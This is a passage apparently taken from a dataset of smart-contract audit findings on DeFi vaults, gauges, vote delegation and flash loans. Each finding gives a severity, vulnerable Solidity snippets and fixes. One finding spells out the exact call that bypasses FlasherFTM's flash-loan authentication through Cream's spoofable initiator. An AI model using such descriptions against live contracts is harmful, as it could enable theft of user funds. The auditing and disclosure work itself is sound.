increase:\\n```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n\\n```\\nfunction totalVaultFunds() public view returns (uint256) {\\n return\\n IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds();\\n}\\n```\\n\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\nHowever, this does not account for the reward tokens yielded throughout that time. From the smart contract logic alone, there is no requirement to first execute the reward token harvest. It is up to the keeper to execute `ConvexTradeExecutor.claimRewards` in order to claim and swap their rewards into ETH, which only then will be included into the yield in the above `ConvexPositionHandler.positionInWantToken` function. If this is not done prior to processing new deposits and minting new shares, new depositors would unfairly benefit from the reward tokens' yield that was generated before they deposited but accounted for in the vault funds only after they deposited.\\n2. Order of operations: closing Lyra options before processing new deposits.\\nThe other part of the vault's strategy is utilising the yield from Convex to purchase options from Lyra on Optimism. While Lyra options are risky and can become worthless in the event of bad trades, only yield is used for them, therefore keeping user deposits' initial value safe. However, their value could also yield significant returns, increasing the overall funds of the vault. Just as with `ConvexTradeExecutor`, `LyraTradeExecutor` also has a `totalFunds()` function that feeds into the vault's `totalVaultFunds()` function. In Lyra's case, however, it is a manually set value by the keeper that is supposed to represent the value of Lyra L2 options:\\n```\\nfunction totalFunds()\\n public\\n view\\n override\\n returns (uint256 posValue, uint256 lastUpdatedBlock)\\n{\\n return (\\n positionInWantToken.posValue +\\n IERC20(vaultWantToken()).balanceOf(address(this)),\\n positionInWantToken.lastUpdatedBlock\\n );\\n}\\n```\\n\\n```\\nfunction setPosValue(uint256 \\_posValue) public onlyKeeper {\\n LyraPositionHandler.\\_setPosValue(\\_posValue);\\n}\\n```\\n\\n```\\nfunction \\_setPosValue(uint256 \\_posValue) internal {\\n positionInWantToken.posValue = \\_posValue;\\n positionInWantToken.lastUpdatedBlock = block.number;\\n}\\n```\\n\\nSolely from the smart contract logic, there is a possibility that a user deposits when Lyra options are valued high, meaning the total vault funds are high as well, thus decreasing the amount of shares the user would have received if it weren't for the Lyra options' value. Consequently, if after the deposit the Lyra options become worthless, decreasing the total vault funds, the user's newly minted shares will now represent less than what they have deposited.\\nWhile this is not currently mitigated by smart contract logic, it may be worked around by the keeper first settling and closing all Lyra options and transferring all their yielded value in ETH, if any, to the Convex trade executor. Only then the keeper would process new deposits and mint new shares. This order of operations is critical to maintain the vault's intended safe strategy of maintaining the user's deposited value, and is dependent entirely on the keeper offchain logic.\\n3. Order of operations: additional trade executors and their specific management Similarly to the above examples, as more trade executors and position handlers are added to the vault, the complexity for the keeper will go up significantly, requiring it to maintain all correct orders of operations not just to keep the shares and funds accounting intact, but simply for the trade executors to function normally. For example, in the case of Lyra, the keepers need to manually call `confirmDeposit` and `confirmWithdraw` to update their `depositStatus` and `withdrawalStatus` respectively to continue normal operations or otherwise new deposits and withdrawals wouldn't be processed. On the other hand, the Convex executor does it automatically. Due to the system design, there may be no single standard way to handle a trade executor. New executors may also require specific calls to be done manually, increasing overall complexity keeper logic to support the system.\\n4. Keeper calls & arguments: depositFunds/batchDeposit and initiateWithdrawal/batchWithdraw `userAddresses[]` array + gas overhead With the current gated approach and batching for deposits and withdrawals to and from the vault, users aren't able to directly mint and redeem their vault shares. Instead, they interact with the `Batcher` contract that then communicates with the `Vault` contract with the help of the keeper. However, while each user's deposit and withdrawal amounts are registered in the contract state variables such as `depositLedger[user]` and `withdrawLedger[user]`, and there is an event emitted with the user address and their action, to process them the keeper is required to keep track of all the user addresses in the batch they need to process. In particular, the keeper needs to provide `address[] memory users` for both `batchDeposit()` and `batchWithdraw()` functions that communicate with the vault. There is no stored list of users within the contract that could provide or verify the right users, so it is entirely up to the keeper's offchain logic to query the logs and retrieve the addresses required. Therefore, depending on the size of the `address[] memory users` array, the keepers may need to consider the transaction gas limit, possibly requiring splitting the array up and doing several transactions to process all of them. In addition, in the event of withdrawals, the keepers need to calculate how much of the `wantToken` (WETH in our case) will be required to process the withdrawals, and call `withdrawFromExecutor()` with that amount to provide enough assets to cover withdrawals from the vault.\\n5. Timing: 50 block radius for updates on trade executors that need to have their values updated via a call Some trade executors, like the Convex one, can retrieve their funds value at any time from Layer 1, thereby always being up to date with the current block. Others, like the Lyra trade executor, require the keeper to update their position value by initiating a call, which also updates their `positionInWantToken.lastUpdatedBlock` state variable. However, this variable is also called during during the vault.totalVaultFunds()call during deposits and withdrawals via `totalExecutorFunds()`, which eventually calls `areFundsUpdated(blockUpdated)`. This is a check to ensure that the current transaction's `block.number <= _blockUpdated + BLOCK_LIMIT`, where BLOCK_LIMIT=50 blocks, i.e. roughly 12-15 min. As a result, keepers need to make sure that all executors that require a call for this have their position values updated before and rather close to processing and deposits or withdrawals, or `areFundsUpdated()` will revert those calls.чDocument the exact order of operations, steps, necessary logs and parameters that keepers need to keep track of in order for the vault strategy to succeed.чч```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n -Approving MAX_UINT amount of ERC20 tokensчlowчApproving the maximum value of uint256 is a known practice to save gas. However, this pattern was proven to increase the impact of an attack many times in the past, in case the approved contract gets hacked.\\n```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n\\n```\\nIERC20(vaultInfo.tokenAddress).approve(vaultAddress, type(uint256).max);\\n```\\n\\n```\\nIERC20(LP\\_TOKEN).safeApprove(ETH\\_STETH\\_POOL, type(uint256).max);\\n\\n// Approve max LP tokens to convex booster\\nIERC20(LP\\_TOKEN).safeApprove(\\n address(CONVEX\\_BOOSTER),\\n type(uint256).max\\n);\\n```\\n\\n```\\ncrv.safeApprove(address(crveth), type(uint256).max);\\n// max approve CVX to CVX/ETH pool on curve\\ncvx.safeApprove(address(cvxeth), type(uint256).max);\\n// max approve LDO to uniswap swap router\\nldo.safeApprove(address(uniswapRouter), type(uint256).max);\\n```\\n\\n```\\nIERC20(wantTokenL2).safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n// approve max susd balance to uniV3 router\\nLyraController.sUSD.safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n```\\nчConsider approving the exact amount that's needed to be transferred, or alternatively, add an external function that allows the revocation of approvals.чч```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n -Batcher.depositFunds may allow for more deposits than vaultInfo.maxAmountчlowчAs part of a gradual rollout strategy, the Brahma-fi system of contracts has a limit of how much can be deposited into the protocol. This is implemented through the `Batcher` contract that allows users to deposit into it and keep the amount they have deposited in the `depositLedger[recipient]` state variable. In order to cap how much is deposited, the user's input `amountIn` is evaluated within the following statement:\\n```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n \"MAX\\_LIMIT\\_EXCEEDED\"\\n);\\n```\\n\\nHowever, while `pendingDeposit`, `amountIn`, and `vaultInfo.maxAmount` are denominated in the vault asset token (WETH in our case), `IERC20(vaultInfo.vaultAddress).totalSupply()` and `pendingWithdrawal` represent vault shares tokens, creating potential mismatches in this evaluation.\\nAs the yield brings in more and more funds to the vault, the amount of share minted for each token deposited in decreases, so `totalSupply()` becomes less than the total deposited amount (not just vault funds) as the strategy succeeds over time. For example, at first `X` deposited tokens would mint `X` shares. After some time, this would create additional funds in the vault through yield, and another `X` deposit of tokens would mint less than `X` shares, say `X-Y`, where `Y` is some number greater than 0 representing the difference in the number of shares minted. So, while there were `2*X` deposited tokens, `totalSupply()=(2*X-Y)` shares would have been minted in total. However, at the time of the next deposit, a user's `amountIn` will be added with `totalSupply()=(2*X-Y)` number of shares instead of a greater `2*X` number of deposited tokens. So, this will undershoot the actual amount of tokens deposited after this user's deposit, thus potentially evaluating it less than `maxAmount`, and letting more user deposits get inside the vault than what was intended.чConsider either documenting this potential discrepancy or keeping track of all deposits in a state variable and using that inside the `require` statement..чч```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n \"MAX\\_LIMIT\\_EXCEEDED\"\\n);\\n```\\n -BaseTradeExecutor.confirmDeposit | confirmWithdraw - Violation of the “checks-effects-interactions” patternчlowчBoth `confirmDeposit, confirmWithdraw` might be re-entered by the keeper (in case it is a contract), in case the derived contract allows the execution of untrusted code.\\n```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, \"DEPOSIT\\_COMPLETED\");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n\\n```\\nfunction confirmWithdraw() public override onlyKeeper {\\n require(withdrawalStatus.inProcess, \"WIHDRW\\_COMPLETED\");\\n \\_confirmWithdraw();\\n withdrawalStatus.inProcess = false;\\n}\\n```\\nчAlthough the impact is very limited, it is recommended to implement the “checks-effects-interactions” in both functions.чч```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, \"DEPOSIT\\_COMPLETED\");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n -Reactivated gauges can't queue up rewardsчhighчActive gauges as set in `ERC20Gauges.addGauge()` function by authorised users get their rewards queued up in the `FlywheelGaugeRewards._queueRewards()` function. As part of it, their associated struct `QueuedRewards` updates its `storedCycle` value to the cycle in which they get queued up:\\n```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n\\nHowever, these gauges may be deactivated in `ERC20Gauges.removeGauge()`, and they will now be ignored in either `FlywheelGaugeRewards.queueRewardsForCycle()` or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()` because both use `gaugeToken.gauges()` to get the set of gauges for which to queue up rewards for the cycle, and that only gives active gauges. Therefore, any updates `FlywheelGaugeRewards` makes to its state will not be done to deactivated gauges' `QueuedRewards` structs. In particular, the `gaugeCycle` contract state variable will keep advancing throughout its cycles, while `QueuedRewards.storedCycle` will retain its previously set value, which is the cycle where it was queued and not 0.\\nOnce reactivated later with at least 1 full cycle being done without it, it will produce issues. It will now be returned by `gaugeToken.gauges()` to be processed in either FlywheelGaugeRewards.queueRewardsForCycle()or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()`, but, once the reactivated gauge is passed to `_queueRewards()`, it will fail an assert:\\n```\\nassert(queuedRewards.storedCycle == 0 || queuedRewards.storedCycle >= lastCycle);\\n```\\n\\nThis is because it already has a set value from the cycle it was processed in previously (i.e. storedCycle>0), and, since that cycle is at least 1 full cycle behind the state contract, it will also not pass the second condition `queuedRewards.storedCycle >= lastCycle`.\\nThe result is that this gauge is locked out of queuing up for rewards because `queuedRewards.storedCycle` is only synchronised with the contract's cycle later in `_queueRewards()` which will now always fail for this gauge.чAccount for the reactivated gauges that previously went through the rewards queue process, such as introducing a separate flow for newly activated gauges. However, any changes such as removing the above mentioned `assert()` should be carefully validated for other downstream logic that may use the `QueuedRewards.storedCycle` value. Therefore, it is recommended to review the state transitions as opposed to only passing this specific check.чч```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n -Reactivated gauges have incorrect accounting for the last cycle's rewardsчmediumчAs described in https://github.com/ConsenSysDiligence/fei-labs-audit-2022-04/issues/3, reactivated gauges that previously had queued up rewards have a mismatch between their `storedCycle` and contract's `gaugeCycle` state variable.\\nDue to this mismatch, there is also a resulting issue with the accounting logic for its completed rewards:\\n```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n\\nConsequently, this then produces an incorrect value for QueuedRewards.priorCycleRewards:\\n```\\npriorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n```\\n\\nAs now `completedRewards` will be equal to 0 instead of the previous cycle's rewards for that gauge. This may cause a loss of rewards accounted for this gauge as this value is later used in `getAccruedRewards()`.чConsider changing the logic of the check so that `storedCycle` values further in the past than `lastCycle` may produce the right rewards return for this expression, such as using `<=` instead of `==` and adding an explicit check for `storedCycle` `==` 0 to account for the initial scenario.чч```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n -Lack of input validation in delegateBySigчlowч```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, \"ERC20MultiVotes: signature expired\");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, \"ERC20MultiVotes: invalid nonce\");\\n \\_delegate(signer, delegatee);\\n}\\n```\\nчIntroduce a zero address check i.e `require signer!=address(0)` and check if the recovered signer is an expected address. Refer to ERC20's permit for inspiration.чч```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, \"ERC20MultiVotes: signature expired\");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n \"\\x19\\x01\",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, \"ERC20MultiVotes: invalid nonce\");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n -Decreasing maxGauges does not account for users' previous gauge list size.чlowч`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.чEither document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.чч```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n -Decrementing a gauge by 0 that is not in the user gauge list will fail an assert.чlowч`ERC20Gauges._decrementGaugeWeight` has an edge case scenario where a user can attempt to decrement a `gauge` that is not in the user `gauge` list by 0 `weight`, which would trigger a failure in an assert.\\n```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n\\nAs `_decrementGaugeWeight`, `decrementGauge`, or `decrementGauges` don't explicitly check that a `gauge` belongs to the user, the contract logic continues with its operations in `_decrementGaugeWeight` for any gauges passed to it. In general this is fine because if a user tries to decrement non-zero `weight` from a `gauge` they have no allocation to, thus getting `getUserGaugeWeight[user][gauge]=0`, there would be a revert due to a negative value being passed to `getUserGaugeWeight[user][gauge]`\\n```\\nuint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\ngetUserGaugeWeight[user][gauge] = oldWeight - weight;\\n```\\n\\nHowever, passing a `weight=0` parameter with a `gauge` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (oldWeight == weight)`, which would also succeed since both are 0, to finally reach an assert that will verify a remove of that `gauge` from the user `gauge` list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_userGauges[user].remove(gauge));\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail.чReplace `assert()` with a `require()` or verify that the gauge belongs to the user prior to performing any operations.чч```\\nfunction \\_decrementGaugeWeight(\\n address user,\\n address gauge,\\n uint112 weight,\\n uint32 cycle\\n) internal {\\n uint112 oldWeight = getUserGaugeWeight[user][gauge];\\n\\n getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n -Undelegating 0 votes from an address who is not a delegate of a user will fail an assert.чlowчSimilar scenario with issue 5.5. `ERC20MultiVotes._undelegate` has an edge case scenario where a user can attempt to undelegate from a `delegatee` that is not in the user delegates list by 0 `amount`, which would trigger a failure in an assert.\\n```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n\\nAs `_undelegate`, or `undelegate` don't explicitly check that a `delegatee` belongs to the user, the contract logic continues with its operations in `_undelegate` for the `delegatee` passed to it. In general this is fine because if a user tries to `undelegate` non-zero `amount` from a `delegatee` they have no votes delegated to, thus getting `_delegatesVotesCount[delegator][delegatee]=0`, there would be a revert due to a negative value being passed to `uint256 newDelegates`\\n```\\nuint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n```\\n\\nHowever, passing a `amount=0` parameter with a `delegatee` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (newDelegates == 0)`, which would succeed, to finally reach an assert that will verify a remove of that `delegatee` from the user delegates list. However, it will fail since it was never there in the first place.\\n```\\nassert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail, as per the dev comment in that line “// Should never fail”.чReplace `assert()` with a `require()` or verify that the delegatee belongs to the user prior to performing any operations.чч```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n -xTRIBE.emitVotingBalances - DelegateVotesChanged event can be emitted by anyoneчmediumч`xTRIBE.emitVotingBalances` is an external function without authentication constraints. It means anyone can call it and emit `DelegateVotesChanged` which may impact other layers of code that rely on these events.\\n```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\nчConsider restricting access to this function for allowed accounts only.чч```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n -Decreasing maxGauges does not account for users' previous gauge list size.чlowч`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.чEither document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.чч```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n -Accounts that claim incentives immediately before the migration will be stuckчmediumчFor accounts that existed before the migration to the new incentive calculation, the following happens when they claim incentives for the first time after the migration: First, the incentives that are still owed from before the migration are computed according to the old formula; the incentives since the migration are calculated according to the new logic, and the two values are added together. The first part - calculating the pre-migration incentives according to the old formula - happens in function MigrateIncentives.migrateAccountFromPreviousCalculation; the following lines are of particular interest in the current context:\\n```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n\\nThe division in the last line will throw if `finalMigrationTime` and `lastClaimTime` are equal. This will happen if an account claims incentives immediately before the migration happens - where “immediately” means in the same block. In such a case, the account will be stuck as any attempt to claim incentives will revert.чThe function should return `0` if `finalMigrationTime` and `lastClaimTime` are equal. Moreover, the variable name `timeSinceMigration` is misleading, as the variable doesn't store the time since the migration but the time between the last incentive claim and the migration.чч```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n -type(T).max is inclusiveчlowчThroughout the codebase, there are checks whether a number can be represented by a certain type.\\n```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n\\n```\\nrequire(blockTime < type(uint32).max); // dev: block time overflow\\n```\\n\\n```\\nrequire(totalSupply <= type(uint96).max);\\nrequire(blockTime <= type(uint32).max);\\n```\\n\\nSometimes these checks use `<=`, sometimes they use `<`.ч`type(T).max` is inclusive, i.e., it is the greatest number that can be represented with type `T`. Strictly speaking, it can and should therefore be used consistently with `<=` instead of `<`.чч```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n -FlasherFTM - Unsolicited invocation of the callback (CREAM auth bypass)чhighчTL;DR: Anyone can call `ICTokenFlashloan(crToken).flashLoan(address(FlasherFTM), address(FlasherFTM), info.amount, params)` directly and pass validation checks in `onFlashLoan()`. This call forces it to accept unsolicited flash loans and execute the actions provided under the attacker's `FlashLoan.Info`.\\n`receiver.onFlashLoan(initiator, token, amount, ...)` is called when receiving a flash loan. According to EIP-3156, the `initiator` is `msg.sender` so that one can use it to check if the call to `receiver.onFlashLoan()` was unsolicited or not.\\nThird-party Flash Loan provider contracts are often upgradeable.\\nFor example, the Geist lending contract configured with this system is upgradeable. Upgradeable contracts bear the risk that one cannot assume that the contract is always running the same code. In the worst case, for example, a malicious proxy admin (leaked keys, insider, …) could upgrade the contract and perform unsolicited calls with arbitrary data to Flash Loan consumers in an attempt to exploit them. It, therefore, is highly recommended to verify that flash loan callbacks in the system can only be called if the contract was calling out to the provider to provide a Flash Loan and that the conditions of the flash loan (returned data, amount) are correct.\\nNot all Flash Loan providers implement EIP-3156 correctly.\\nCream Finance, for example, allows users to set an arbitrary `initiator` when requesting a flash loan. This deviates from EIP-3156 and was reported to the Cream development team as a security issue. Hence, anyone can spoof that `initiator` and potentially bypass authentication checks in the consumers' `receiver.onFlashLoan()`. Depending on the third-party application consuming the flash loan is doing with the funds, the impact might range from medium to critical with funds at risk. For example, projects might assume that the flash loan always originates from their trusted components, e.g., because they use them to refinance switching funds between pools or protocols.\\nThe `FlasherFTM` contract assumes that flash loans for the Flasher can only be initiated by authorized callers (isAuthorized) - for a reason - because it is vital that the `FlashLoan.Info calldata info` parameter only contains trusted data:\\n```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n\\n```\\nmodifier isAuthorized() {\\n require(\\n msg.sender == \\_fujiAdmin.getController() ||\\n msg.sender == \\_fujiAdmin.getFliquidator() ||\\n msg.sender == owner(),\\n Errors.VL\\_NOT\\_AUTHORIZED\\n );\\n \\_;\\n}\\n```\\n\\nThe Cream Flash Loan initiation code requests the flash loan via ICTokenFlashloan(crToken).flashLoan(receiver=address(this), initiator=address(this), ...):\\n```\\n/\\*\\*\\n \\* @dev Initiates an CreamFinance flashloan.\\n \\* @param info: data to be passed between functions executing flashloan logic\\n \\*/\\nfunction \\_initiateCreamFlashLoan(FlashLoan.Info calldata info) internal {\\n address crToken = info.asset == \\_FTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(info.asset);\\n\\n // Prepara data for flashloan execution\\n bytes memory params = abi.encode(info);\\n\\n // Initialize Instance of Cream crLendingContract\\n ICTokenFlashloan(crToken).flashLoan(address(this), address(this), info.amount, params);\\n}\\n```\\n\\nNote: The Cream implementation does not send `sender=msg.sender` to the `onFlashLoan()` callback - like any other flash loan provider does and EIP-3156 suggests - but uses the value that was passed in as `initiator` when requesting the callback. This detail completely undermines the authentication checks implemented in `onFlashLoan` as the `sender` value cannot be trusted.\\n```\\naddress initiator,\\n```\\n\\n```\\n \\*/\\nfunction onFlashLoan(\\n address sender,\\n address underlying,\\n uint256 amount,\\n uint256 fee,\\n bytes calldata params\\n) external override returns (bytes32) {\\n // Check Msg. Sender is crToken Lending Contract\\n // from IronBank because ETH on Cream cannot perform a flashloan\\n address crToken = underlying == \\_WFTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(underlying);\\n require(msg.sender == crToken && address(this) == sender, Errors.VL\\_NOT\\_AUTHORIZED);\\n```\\nчCream Finance\\nWe've reached out to the Cream developer team, who have confirmed the issue. They are planning to implement countermeasures. Our recommendation can be summarized as follows:\\nImplement the EIP-3156 compliant version of flashLoan() with initiator hardcoded to `msg.sender`.\\nFujiDAO (and other flash loan consumers)\\nWe recommend not assuming that `FlashLoan.Info` contains trusted or even validated data when a third-party flash loan provider provides it! Developers should ensure that the data received was provided when the flash loan was requested.\\nThe contract should reject unsolicited flash loans. In the scenario where a flash loan provider is exploited, the risk of an exploited trust relationship is less likely to spread to the rest of the system.\\nThe Cream `initiator` provided to the `onFlashLoan()` callback cannot be trusted until the Cream developers fix this issue. The `initiator` can easily be spoofed to perform unsolicited flash loans. We, therefore, suggest:\\nValidate that the `initiator` value is the `flashLoan()` caller. This conforms to the standard and is hopefully how the Cream team is fixing this, and\\nEnsure the implementation tracks its own calls to `flashLoan()` in a state-variable semaphore, i.e. store the flash loan data/hash in a temporary state-variable that is only set just before calling `flashLoan()` until being called back in `onFlashLoan()`. The received data can then be verified against the stored artifact. This is a safe way of authenticating and verifying callbacks.\\nValues received from untrusted third parties should always be validated with the utmost scrutiny.\\nSmart contract upgrades are risky, so we recommend implementing the 